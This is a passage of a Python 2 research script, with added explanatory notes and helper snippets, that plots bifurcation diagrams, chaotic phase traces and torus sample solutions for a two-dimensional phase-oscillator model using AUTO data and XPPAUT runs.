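dom = np.linspace(2.0, 2.5, 100)
amp = hopf_amplitude(dom, g_c=2.0, coeff=10.0 / 13.0)
```

The amplitude grows as the square root of the distance past the bifurcation, which is why the AUTO branch and the normal-form curve agree only close to onset.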
def g_nu_fig():
"""
plot g(nu)
"""
N = 100
nu = np.linspace(.00001,1,N)
s = np.linspace(0,10.,100)
ds = s[1]-s[0] # grid spacing; (s[-1]-s[0])/len(s) is off by one for linspace
g1 = np.zeros(N)
g2 = np.zeros(N)
for i in range(N):
tot = 0
tot2 = 0
# find integral of exp(-s)*H(nu s)
for j in range(len(s)):
tot += np.exp(-s[j])*(sin(nu[i]*s[j])-(.25)*sin(2.*nu[i]*s[j]))*ds#np.sin(nu[i]*s[j])*ds
tot2 += np.exp(-s[j])*(sin(nu[i]*s[j]))*ds#np.sin(nu[i]*s[j])*ds
g1[i] = nu[i]/tot
g2[i] = nu[i]/tot2
fig = plt.figure(figsize=(10,4))
ax2 = fig.add_subplot(121)
ax2.plot(nu,g2,lw=3,ls='-',color='black')
ax2.set_title(r'\textbf{(a)}',fontsize=20,x=0,y=1.03)
ax2.set_ylabel(r'$g(\nu)$',fontsize=20)
ax2.set_xlabel(r'$\nu$',fontsize=20)
ax2.tick_params(labelsize=15)
ax1 = fig.add_subplot(122)
split_idx = np.argmin(g1)
ax1.plot(nu[:split_idx],g1[:split_idx],lw=3,ls='--',color='black')
ax1.plot(nu[split_idx:],g1[split_idx:],lw=3,ls='-',color='black')
ax1.set_title(r'\textbf{(b)}',fontsize=20,x=0,y=1.03)
ax1.set_xlabel(r'$\nu$',fontsize=20)
ax1.tick_params(labelsize=15)
return fig
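The double loop in `g_nu_fig` evaluates g(nu) = nu / int_0^inf exp(-s)*H(nu*s) ds one sample at a time with a left Riemann sum. A vectorized sketch of the same quantity (truncation at `s_max` and trapezoid rule are my choices, not the original's):

```python
import numpy as np

def g_of_nu(nu, H, s_max=10.0, n_s=2001):
    """g(nu) = nu / integral_0^infty exp(-s) * H(nu*s) ds.

    The integral is truncated at s_max and evaluated with the trapezoid
    rule, vectorized over all nu at once (the loops in g_nu_fig do the
    same computation one point at a time).
    """
    nu = np.asarray(nu, dtype=float)
    s = np.linspace(0.0, s_max, n_s)
    f = np.exp(-s) * H(nu[:, None] * s[None, :])
    ds = s[1] - s[0]
    integral = 0.5 * (f[:, :-1] + f[:, 1:]).sum(axis=1) * ds
    return nu / integral

# with H(theta) = sin(theta) the integral is nu/(1 + nu**2) in closed
# form, so g(nu) should come out close to 1 + nu**2
nu = np.linspace(0.1, 1.0, 10)
g = g_of_nu(nu, np.sin)
```

The closed-form check above is a useful sanity test for the quadrature resolution before plotting the truncated-H version.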
#plt.show()
def oned_chaos_fig():
"""
"""
fig = plt.figure(figsize=(10,3))
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax1 = fig.add_subplot(121)
c1 = np.loadtxt("chaos_simple1.dat")
c2 = np.loadtxt("chaos_simple2.dat")
NT = len(c1)
t = np.linspace(0,50000,NT)
dt = t[1]-t[0] # sample spacing; t[-1]/NT is off by one for linspace
start_t = 14000
end_t = 20000
sidx = int(start_t/dt)
eidx = int(end_t/dt)
for slc in unlink_wrap(c1[sidx:eidx]):
ax1.plot(t[sidx:eidx][slc],c1[sidx:eidx][slc],color='black',lw=2)
for slc in unlink_wrap(c2[sidx:eidx]):
ax1.plot(t[sidx:eidx][slc],c2[sidx:eidx][slc],color='#3399ff',lw=2,ls='--',dashes=(5,1))
ax1.set_ylabel(r'$\bm{\theta}$')
ax1.set_xlabel(r'$\bm{t}$')
ax1.set_xlim(start_t,end_t)
ax1.set_ylim(-pi,pi)
ax1.set_yticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax1.set_yticklabels(x_label)
ax2 = fig.add_subplot(122)
ct1 = np.loadtxt("chaos_simple_theory1.dat")
ct2 = np.loadtxt("chaos_simple_theory2.dat")
NTt = len(ct1)
t2 = np.linspace(0,50000,NTt)
dt2 = t2[1]-t2[0] # sample spacing
start_t2 = 34000
end_t2 = 40000
sidx2 = int(start_t2/dt2)
eidx2 = int(end_t2/dt2)
for slc in unlink_wrap(ct1[sidx2:eidx2]):
ax2.plot(t2[sidx2:eidx2][slc],ct1[sidx2:eidx2][slc],color='black',lw=2)
for slc in unlink_wrap(ct2[sidx2:eidx2]):
ax2.plot(t2[sidx2:eidx2][slc],ct2[sidx2:eidx2][slc],color='#3399ff',lw=2,ls='--',dashes=(5,1))
#ax2.set_ylabel(r'$\bm{\theta}$')
ax2.set_xlabel(r'$\bm{t}$')
ax2.set_xlim(start_t2,end_t2)
ax2.set_ylim(-pi,pi)
ax2.set_yticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax2.set_yticklabels(x_label)
return fig
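Both panels above convert a time window to array indices with `int(start_t/dt)`, which assumes a uniform grid. `np.searchsorted` does the same lookup for any monotonically increasing time array; a small sketch (a hypothetical helper, not one the file defines):

```python
import numpy as np

def time_window(t, start_t, end_t):
    """Return (sidx, eidx) so that t[sidx:eidx] covers [start_t, end_t).

    Works for any monotonically increasing t, not only uniformly
    spaced arrays, since it looks the endpoints up directly.
    """
    sidx = int(np.searchsorted(t, start_t, side='left'))
    eidx = int(np.searchsorted(t, end_t, side='left'))
    return sidx, eidx

t = np.linspace(0.0, 50000.0, 100001)  # uniform grid, dt = 0.5
sidx, eidx = time_window(t, 14000.0, 20000.0)
```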
def twod_auto_3terms_fig_old():
"""
twod bifurcation diagram for truncated h
"""
#raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
if True:
raw_data = np.loadtxt('twodphs_sxs_wave_diagram_q=.125.dat')
raw_data2 = np.loadtxt('twodphs_sxs_osc2_diagram_q=.125.dat')
raw_data3 = np.loadtxt('twodphs_sxs_hopf_diagram_q=.125.dat')
raw_data4 = np.loadtxt('twodphs_sxs_wave2_diagram_q=.125.dat')
if False:
raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
raw_data2 = np.loadtxt('twodphs_cys_osc2_diagram_q=.125.dat')
raw_data3 = np.loadtxt('twodphs_cys_hopf_diagram_q=.125.dat')
raw_data4 = np.loadtxt('twodphs_cys_wave2_diagram_q=.125.dat')
if False:
raw_data = np.loadtxt('twodphs_x_wave_diagram_q=.125.dat')
raw_data2 = np.loadtxt('twodphs_cys_osc2_diagram_q=.125.dat')
raw_data3 = np.loadtxt('twodphs_x_hopf_diagram_q=.125.dat')
raw_data4 = np.loadtxt('twodphs_x_wave2_diagram_q=.125.dat')
data = diagram.read_diagram(raw_data)
data2 = diagram.read_diagram(raw_data2)
data3 = diagram.read_diagram(raw_data3)
data4 = diagram.read_diagram(raw_data4)
print 'diagram data shape:', np.shape(data)
fig = plt.figure()
ax = fig.add_subplot(111)
# plot unstable fixed points
ax.scatter(data[:,0],data[:,2],s=10,color='black')
ax.scatter(data[:,0],data[:,6],s=10,color='black')
ax.scatter(data3[:,0],data3[:,2],s=10,color='black')
ax.scatter(data3[:,0],data3[:,6],s=10,color='black')
# plot unstable periodic solutions
ax.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data[:,0],data[:,8],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data2[:,0],data2[:,4],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data2[:,0],data2[:,8],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data3[:,0],data3[:,4],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data3[:,0],data3[:,8],s=10,facecolor='none',edgecolor='blue')
ax.scatter(data4[:,0],data4[:,4],s=10,facecolor='none',edgecolor='#0099ff')
ax.scatter(data4[:,0],data4[:,8],s=10,facecolor='none',edgecolor='#0099ff')
# plot stable fixed points
ax.scatter(data[:,0],data[:,1],s=10,color='red')
ax.scatter(data[:,0],data[:,5],s=10,color='red')
ax.scatter(data3[:,0],data3[:,1],s=10,color='red')
ax.scatter(data3[:,0],data3[:,5],s=10,color='red')
# plot stable periodic solutions
ax.scatter(data[:,0],data[:,3],s=20,color='green')
ax.scatter(data[:,0],data[:,7],s=20,color='green')
ax.scatter(data2[:,0],data2[:,3],s=20,color='green')
ax.scatter(data2[:,0],data2[:,7],s=20,color='green')
ax.scatter(data3[:,0],data3[:,3],s=20,color='green')
ax.scatter(data3[:,0],data3[:,7],s=20,color='green')
ax.scatter(data4[:,0],data4[:,3],s=20,color='#00cc00')
ax.scatter(data4[:,0],data4[:,7],s=20,color='#00cc00')
ax.set_xlim(.5,3)
ax.set_ylim(-.01,1.)
return fig
def get_switch_points(data):
"""
given all-info bifurcation diagram data, find all locations where stability changes. (stub; not yet implemented)
"""
pass
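One plausible way to fill in the stub above, assuming the all-info rows carry the AUTO point-type code in column 0 with its sign encoding stability (the convention the plotting code below relies on via `abs(bif_data[rown,0])`): report the rows where that sign flips. This is a sketch under that assumption, not the author's implementation:

```python
import numpy as np

def get_switch_points_sketch(data, type_col=0):
    """Indices where the sign of the point-type code changes.

    Assumes the sign of data[:, type_col] encodes stability, so a sign
    change along the branch marks a stability switch. Returns the index
    of the first row of each new stability regime.
    """
    sign = np.sign(data[:, type_col])
    return np.nonzero(np.diff(sign) != 0)[0] + 1

# toy branch: stable (type 4), unstable (-4), stable again
dat = np.array([[4.0], [4.0], [-4.0], [-4.0], [4.0]])
switches = get_switch_points_sketch(dat)
```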
def twod_phase_auto_3terms_fig1():
"""
twod bifurcation diagram for truncated h
q = 0.01
"""
#raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
# all info data files are organized as follows:
# Type, BR, 0, par1, par1/2, period, sv1 (high), ..., sv10 (high), sv1 (low), ..., sv10 (low), real/im eigenvalue pairs...
# so I could use these values as initial conditions to plot.
bif_data = np.loadtxt('twodphs_3_sxs_TR_q=.01.dat')
init_data = np.loadtxt('twodphs_3_init_TR_q=.01.dat')
# manually get index of sxs value
idx = 5
fig = plt.figure(figsize=(6,7))
### BIFURCATION DIAGRAM
gs = gridspec.GridSpec(4, 4)
gs.update(hspace=.75)
gs.update(wspace=.3)
ax11 = plt.subplot(gs[:3, :3])
#ax11 = plt.subplot2grid((4,4),(0,0),colspan=3,rowspan=2)
#ax21 = plt.subplot2grid((4,4),(2,0),colspan=3,rowspan=1,sharex=ax11)
#ax11 = plt.subplot2grid((4,4),(0,0),colspan=3,rowspan=3)
# pre-allocate for conversion to simple bifurcation data
bif_data_simple = np.zeros((len(bif_data[:,0]),6))
# remember write pts from auto gives: par, max, min, type, BR.
# parameter value
bif_data_simple[:,0] = bif_data[:,3]
# max value
# first get relative position of desired state variable
bif_data_simple[:,1] = bif_data[:,5+idx]
# min value
bif_data_simple[:,2] = bif_data[:,5+idx+10]
# type
bif_data_simple[:,3] = bif_data[:,0]
# branch
bif_data_simple[:,4] = abs(bif_data[:,1])
data = diagram.read_diagram(bif_data_simple)
for i in range(1,len(data[0,:])):
x = data[:,0]
y = data[:,i]
data[:,0],data[:,i]=clean(x,y,tol=.1)
if (i == 4):
print 'removing redundant x values in column', i
x = data[:,0]
y = data[:,i]
data[:,0],data[:,i]=remove_redundant_x(x,y,tol=1e-7)
# plot unstable fixed points
#ax11.scatter(data[:,0],data[:,2],s=10,color='black')
ax11.plot(data[:,0],data[:,2],color='black')
# plot unstable periodic solutions
#ax11.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
ax11.plot(data[:,0],data[:,4],color='blue')
#ax.scatter(data[:,0],data[:,8],s=10,facecolor='none',edgecolor='blue')
# plot stable fixed points
#ax11.scatter(data[:,0],data[:,1],s=10,color='red')
#ax11.scatter(data[:,0],data[:,5],s=10,color='red')
ax11.plot(data[:,0],data[:,1],color='red')
ax11.plot(data[:,0],data[:,5],color='red')
# plot stable periodic solutions
#ax11.scatter(data[:,0],data[:,3],s=5,color='green')
#ax11.scatter(data[:,0],data[:,7],s=5,color='green')
ax11.plot(data[:,0],data[:,3],color='green',lw=3,ls='--')
ax11.plot(data[:,0],data[:,7],color='green',lw=3,ls='--')
ax11.set_xlabel('$g$')
ax11.xaxis.set_label_coords(0.5,-.03)
ax11.set_ylabel('$sx$')
ax11.set_xlim(.5,1)
ax11.set_ylim(.75,1)
# bifurcation diagram inset
axins11 = inset_axes(ax11,
width="60%", # width = 30% of parent_bbox
height="40%", # height : 1 inch
loc=3)
axins11.plot(data[:,0],data[:,4],color='blue')
axins11.plot(data[:,0],data[:,3],color='green',lw=3,ls='--')
axins11.plot(data[:,0],data[:,7],color='green',lw=3,ls='--')
ax11.annotate("TR",
xy=(.9095,.79), xycoords='data',
xytext=(.9,.82), textcoords='data',
size=15,
color='red',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axins11.annotate("PD",
xy=(.5984,.9745), xycoords='data',
xytext=(.595,.973), textcoords='data',
size=15,
color='black',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axins11.annotate("BP",
xy=(.59,.9795), xycoords='data',
xytext=(.588,.977), textcoords='data',
size=15,
color='blue',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
#axins11.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#axins11.scatter(data[:,0],data[:,3],s=5,color='green')
#axins11.scatter(data[:,0],data[:,7],s=5,color='green')
#axins11.scatter(g,sxsval,color='purple')
mark_inset(ax11, axins11, loc1=2, loc2=4, fc="none", ec="0.5")
plt.xticks(visible=False)
plt.yticks(visible=False)
axins11.set_xlim(.586105,.600328)
axins11.set_ylim(.972532,.984061)
# LOOP OVER SAMPLE SOLUTIONS
rlist = [957,998,1206,655,634,587,8]
loclist = [(3,0),(3,1),(3,2),(0,3),(1,3),(2,3),(3,3)]
labellist = [r'\textbf{A}',r'\textbf{B}',r'\textbf{C}',r'\textbf{D}',r'\textbf{E}',r'\textbf{F}',r'\textbf{G}']
pos = []
axlist = []
for i in range(len(rlist)):
rown = rlist[i]
g = bif_data[rown,3]
per = bif_data[rown,5]
init = init_data[rown,5:]
dt = .01
#print g,per,bif_data[rown,6:6+10]
print 'g =', init_data[rown,2], 'per =', init_data[rown,4], 'init =', init
npa, vn = xpprun('twodphs3.ode',
xppname='xppaut',
inits={'x':init[0],'y':init[1],
'cxs':init[2],'cys':init[3],
'sxs':init[4],'sys':init[5],
'sxsys':init[6],'sxcys':init[7],
'cxsys':init[8],'cxcys':init[9]},
parameters={'total':per,
'g':g,
'q':0.01,
'dt':dt},
clean_after=True)
t = npa[:,0]
sv = npa[:,1:]
idx = vn.index('sxs')
sxsval = bif_data[rown,6+idx]
#axlist.append(plt.subplot2grid((4,4),loclist[i]))
axlist.append(plt.subplot(gs[loclist[i][0],loclist[i][1]]))
"""
ax41 = plt.subplot2grid((4,4),(3,0))
ax42 = plt.subplot2grid((4,4),(3,1))
ax43 = plt.subplot2grid((4,4),(3,2))
ax14 = plt.subplot2grid((4,4),(0,3))
ax24 = plt.subplot2grid((4,4),(1,3))
ax34 = plt.subplot2grid((4,4),(2,3))
ax44 = plt.subplot2grid((4,4),(3,3))
"""
### SAMPLE SOLUTIONS
xval = np.mod(sv[:,vn.index('x')]+pi,2*pi)-pi
yval = np.mod(sv[:,vn.index('y')]+pi,2*pi)-pi
pos1 = np.where(np.abs(np.diff(xval)) >= 1)[0]
pos2 = np.where(np.abs(np.diff(yval)) >= 1)[0]
xval[pos1] = np.nan
yval[pos1] = np.nan
xval[pos2] = np.nan
yval[pos2] = np.nan
dashes = []
print 'point type:', bif_data[rown,0]
if abs(bif_data[rown,0]) == 4.:
dashes = (5,2)
axlist[i].plot(xval,yval,color='black',lw=2,dashes=dashes)
# label 2 points with arrows
back_idx = 5
idxlist = [0,int((per/dt)/2.)] # start and half-period points; depends on period
for j in idxlist:
axlist[i].annotate("",
xy=(xval[j], yval[j]), xycoords='data',
xytext=(xval[j-back_idx], yval[j-back_idx]), textcoords='data',
size=15,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axlist[i].set_xlim(-pi,pi)
axlist[i].set_ylim(-pi,pi)
axlist[i].tick_params(axis=u'both',which=u'both',length=0)
axlist[i].set_xticks(np.arange(-1,1+1,1)*pi)
axlist[i].set_yticks(np.arange(-1,1+1,1)*pi)
x_label = [r"$-\pi$", r"$0$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
axlist[i].set_xticklabels(x_label)
axlist[i].set_yticklabels(x_label)
if i >= 3:
axlist[i].yaxis.tick_right()
if i < 3:
axlist[i].set_yticklabels([])
if i >= 3 and i < len(labellist)-1:
axlist[i].set_xticklabels([])
# annotations corresponding to solution plots
axins11.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
verticalalignment='top',
horizontalalignment='right',
backgroundcolor='yellow',
zorder=-1
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
ax11.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
backgroundcolor='yellow',
zorder=-1
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
axlist[i].set_title(labellist[i])
"""
ax11.annotate("",
xy=(th1[i], th2[i]), xycoords='data',
xytext=(th1[i-back_idx], th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
"""
#ax11.
ax11.scatter(g,sxsval,s=10,color='black',marker='^')
axins11.scatter(g,sxsval,s=10,color='black',marker='^')
#ax2.plot(t,np.mod(sv[:,vn.index('x')],2*pi))
#ax2.plot(t,np.mod(sv[:,vn.index('sxs')],2*pi))
#ax2.plot(t,np.mod(npa[:,vn.index('sxs')],2*pi))
#ax2.plot(t,np.mod(npa[:,vn.index('y')],2*pi))
return fig
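The wrap-then-NaN block above (`np.mod(... + pi, 2*pi) - pi` followed by blanking `pos1`/`pos2`) recurs in every sample-solution loop in this file. A consolidated sketch of that pattern (a refactoring suggestion, not a helper the file currently defines):

```python
import numpy as np

def wrap_and_mask(x, y, jump=1.0):
    """Wrap two angle series to (-pi, pi) and blank both at wrap jumps.

    After wrapping, any index where either series jumps by more than
    `jump` is set to NaN in both, so a single plot() call draws no line
    across the periodic boundary.
    """
    x = np.mod(np.asarray(x, dtype=float) + np.pi, 2 * np.pi) - np.pi
    y = np.mod(np.asarray(y, dtype=float) + np.pi, 2 * np.pi) - np.pi
    bad = np.nonzero((np.abs(np.diff(x)) >= jump) |
                     (np.abs(np.diff(y)) >= jump))[0]
    x[bad] = np.nan
    y[bad] = np.nan
    return x, y

# a trajectory winding twice around the torus in x, constant in y
xw, yw = wrap_and_mask(np.linspace(0.0, 4 * np.pi, 200), np.zeros(200))
```

Blanking both series at a jump in either one keeps the (x, y) curve from cutting across the square when only one coordinate wraps.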
def twod_phase_auto_3terms_fig2():
"""
twod bifurcation diagram for truncated h
q = 0.1
"""
#raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
# all info data files are organized as follows:
# Type, BR, 0, par1, par1/2, period, sv1 (high), ..., sv10 (high), sv1 (low), ..., sv10 (low), real/im eigenvalue pairs...
# so I could use these values as initial conditions to plot.
bif_data = np.loadtxt('twodphs_3_HB_PD_q=.1_appended.dat')
init_data = np.loadtxt('twodphs_3_init_HB_PD_q=.1_appended.dat')
# manually get index of sxs value
idx = 5
fig = plt.figure(figsize=(7,9))
### BIFURCATION DIAGRAM
gs = gridspec.GridSpec(5, 4)
gs.update(hspace=.4)
gs.update(wspace=.3)
ax11 = plt.subplot(gs[:2, :3])
#ax11 = plt.subplot2grid((4,4),(0,0),colspan=3,rowspan=2)
#ax21 = plt.subplot2grid((4,4),(2,0),colspan=3,rowspan=1,sharex=ax11)
ax21 = plt.subplot(gs[2:4,:3],sharex=ax11)
# pre-allocate for conversion to simple bifurcation data
bif_data_simple = np.zeros((len(bif_data[:,0]),6))
# remember write pts from auto gives: par, max, min, type, BR.
# parameter value
bif_data_simple[:,0] = bif_data[:,3]
# max value
# first get relative position of desired state variable
bif_data_simple[:,1] = bif_data[:,5+idx]
# min value
bif_data_simple[:,2] = bif_data[:,5+idx+10]
# type
bif_data_simple[:,3] = bif_data[:,0]
# branch
bif_data_simple[:,4] = abs(bif_data[:,1])
data = diagram.read_diagram(bif_data_simple)
for i in range(1,len(data[0,:])):
x = data[:,0]
y = data[:,i]
data[:,0],data[:,i]=clean(x,y,tol=.1)
if (i == 4):
print 'removing redundant x values in column', i
x = data[:,0]
y = data[:,i]
data[:,0],data[:,i]=remove_redundant_x(x,y,tol=1e-7)
# plot unstable periodic solutions
#ax11.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data[:,0],data[:,8],s=10,facecolor='none',edgecolor='blue')
ax11.plot(data[:,0],data[:,4],color='blue',zorder=0)
# plot stable periodic solutions
ax11.plot(data[:,0],data[:,3],color='green',lw=3,zorder=0)
#ax11.scatter(data[:,0],data[:,3],s=5,color='green')
#ax11.scatter(data[:,0],data[:,7],s=5,color='green')
# plot stable periodic solutions
ax21.plot(data[:,0],data[:,3],color='green',lw=3,zorder=0)
#ax21.scatter(data[:,0],data[:,3],s=5,color='green')
#ax21.scatter(data[:,0],data[:,7],s=5,color='green')
# plot unstable fixed points
#ax21.scatter(data[:,0],data[:,2],s=10,color='black')
ax21.plot(data[:,0],data[:,2],color='black',zorder=0)
# plot stable fixed points
ax21.plot(data[:,0],data[:,1],color='red',lw=3,zorder=0)
#ax21.scatter(data[:,0],data[:,1],s=10,color='red')
#ax21.scatter(data[:,0],data[:,5],s=10,color='red')
#ax21.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
ax21.plot(data[:,0],data[:,4],color='blue',lw=2,zorder=0)
"""
# bifurcation diagram inset
axins11 = inset_axes(ax11,
width="60%", # width = 30% of parent_bbox
height="40%", # height : 1 inch
loc=3)
#axins11.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#axins11.scatter(data[:,0],data[:,3],s=5,color='green')
#axins11.scatter(data[:,0],data[:,7],s=5,color='green')
#axins11.scatter(g,sxsval,color='purple')
mark_inset(ax11, axins11, loc1=2, loc2=4, fc="none", ec="0.5")
plt.xticks(visible=False)
plt.yticks(visible=False)
"""
# bifurcation diagram inset
ax11.add_patch(
patches.Rectangle(
(.865, .7),
(.88-.865),
(1.05-.7),
fill=False,
alpha=.5
)
)
ax11.text(.82,.66,'**',size=20)
ax21.text(.82,.205,'**',size=20)
#ax11.plot([.865,.84],[.7,.4],color='gray')
#ax11.plot([.88,2.1],[1.05,.4],color='gray')
axins21 = inset_axes(ax21,
width="78%",
height="78%",
loc=1)
#axins21.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#axins21.scatter(data[:,0],data[:,3],s=5,color='green')
#axins21.scatter(data[:,0],data[:,7],s=5,color='green')
#axins11.scatter(g,sxsval,color='purple')
axins21.plot(data[:,0],data[:,4],color='blue',zorder=0)
axins21.plot(data[:,0],data[:,3],color='green',lw=3,zorder=0)
#axins21.text(.866,1.04,'**',size=20)
axins21.set_xlim(.865,.88)
axins21.set_ylim(.7,1.1)
axins21.set_xticks([])
axins21.set_yticks([])
axins21.spines['bottom'].set_color('gray')
axins21.spines['top'].set_color('gray')
axins21.spines['right'].set_color('gray')
axins21.spines['left'].set_color('gray')
#mark_inset(ax21, axins21, loc1=2, loc2=1, fc="none", ec="0.5")
#plt.xticks(visible=False)
#plt.yticks(visible=False)
# label bifurcations
ax11.annotate("LP1",
xy=(.8188,.9727), xycoords='data',
xytext=(.8188,1.05), textcoords='data',
size=15,
color='purple',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("PD1",
xy=(1.64,.59), xycoords='data',
xytext=(1.2,.55), textcoords='data',
size=15,
color='black',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("PD2",
xy=(1.75,.58), xycoords='data',
xytext=(1.5,.51), textcoords='data',
size=15,
color='black',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("PD3",
xy=(1.796,.58), xycoords='data',
xytext=(1.7,.5), textcoords='data',
size=15,
color='black',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("LP*",
xy=(1.818,.59), xycoords='data',
xytext=(1.9,.5), textcoords='data',
size=15,
color='purple',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("BP1",
xy=(2.,.56), xycoords='data',
xytext=(2.1,.56), textcoords='data',
size=15,
color='blue',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("LP2",
xy=(2.03,.59), xycoords='data',
xytext=(2.1,.65), textcoords='data',
size=15,
color='purple',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate('PD4',
xy=(1.738, .65), xycoords='data',
xytext=(1.5, .9), textcoords='data',
size=12,
color='.25',
zorder=-1,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='.25'),
)
ax11.annotate('PD5',
xy=(1.738, .68), xycoords='data',
xytext=(1.7, .85), textcoords='data',
size=12,
color='.25',
zorder=-1,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='.25'),
)
ax21.annotate("HB",
xy=(.65,.0), xycoords='data',
xytext=(.7,.06), textcoords='data',
size=15,
color='orange',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axins21.annotate("TR*",
xy=(.8761,.99), xycoords='data',
xytext=(.878,1.02), textcoords='data',
size=15,
color='red',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("TR2",
xy=(1.18,.95), xycoords='data',
xytext=(1.4,1), textcoords='data',
size=15,
color='red',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
#ax11.xaxis.set_ticks_position('top')
ax11.set_ylim(.48,1.1)
ax21.set_ylim(-.01,.22)
ax11.spines['bottom'].set_visible(False)
ax21.spines['top'].set_visible(False)
ax11.xaxis.tick_top()
ax11.tick_params(labeltop=False)
ax21.xaxis.tick_bottom()
ax11.set_ylabel('$sx$')
ax11.set_xlim(.51,2.3)
#ax11.xaxis.set_ticks_position('top')
#ax21.xaxis.set_ticks_position('bottom')
ax21.set_xlabel('$g$')
ax21.xaxis.set_label_coords(1.,0)
d = .015 # how big to make the diagonal lines in axes coordinates
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=ax11.transAxes, color='k', clip_on=False)
ax11.plot((-d, +d), (-d, +d), **kwargs) # top-left diagonal
ax11.plot((1 - d, 1 + d), (-d, +d), **kwargs) # top-right diagonal
kwargs.update(transform=ax21.transAxes) # switch to the bottom axes
ax21.plot((-d, +d), (1 - d, 1 + d), **kwargs) # bottom-left diagonal
ax21.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) # bottom-right diagonal
# LOOP OVER SAMPLE SOLUTIONS
rlist = [519,1372,886,1164,1654,2349,240,1900]#[957,998,1206,655,634,587,8]
loclist = [(4,0),(4,1),(4,2),(0,3),(1,3),(2,3),(3,3),(4,3)]
labellist = [r'\textbf{A}',r'\textbf{B}',r'\textbf{C}',r'\textbf{D}',r'\textbf{E}',r'\textbf{F}',r'\textbf{G}',r'\textbf{H}']
pos = []
axlist = []
for i in range(len(rlist)):
rown = rlist[i]
g = bif_data[rown,3]
per = bif_data[rown,5]
init = init_data[rown,5:]
dt = .01
#print g,per,bif_data[rown,6:6+10]
print 'g =', g, 'g (init) =', init_data[rown,2], 'per =', init_data[rown,4], 'init =', init
npa, vn = xpprun('twodphs3.ode',
xppname='xppaut',
inits={'x':init[0],'y':init[1],
'cxs':init[2],'cys':init[3],
'sxs':init[4],'sys':init[5],
'sxsys':init[6],'sxcys':init[7],
'cxsys':init[8],'cxcys':init[9]},
parameters={'total':per,
'g':g,
'q':0.1,
'dt':dt},
clean_after=True)
t = npa[:,0]
sv = npa[:,1:]
idx = vn.index('sxs')
sxsval = bif_data[rown,6+idx]
#axlist.append(plt.subplot2grid((4,4),loclist[i]))
axlist.append(plt.subplot(gs[loclist[i][0],loclist[i][1]]))
### PLOT SAMPLE SOLUTIONS
xval = np.mod(sv[:,vn.index('x')]+pi,2*pi)-pi
yval = np.mod(sv[:,vn.index('y')]+pi,2*pi)-pi
pos1 = np.where(np.abs(np.diff(xval)) >= 1)[0]
pos2 = np.where(np.abs(np.diff(yval)) >= 1)[0]
xval[pos1] = np.nan
yval[pos1] = np.nan
xval[pos2] = np.nan
yval[pos2] = np.nan
#for slc in unlink_wrap(xval):
# axlist[i].plot(xval[slc],yval[slc],color='black',lw=2)
dashes = []
print 'point type:', bif_data[rown,0]
if abs(bif_data[rown,0]) == 4.:
dashes = (5,3)
axlist[i].plot(xval,yval,color='black',lw=2,dashes=dashes)
# label 2 points with arrows
back_idx = 10
idxlist = [10,int(1.*(per/dt)/2.)]# depends on period
if i == 0:
factor = 1.3
back_idx = 400
else:
factor = 1.
for j in idxlist:
axlist[i].annotate("",
xy=(factor*xval[j], factor*yval[j]), xycoords='data',
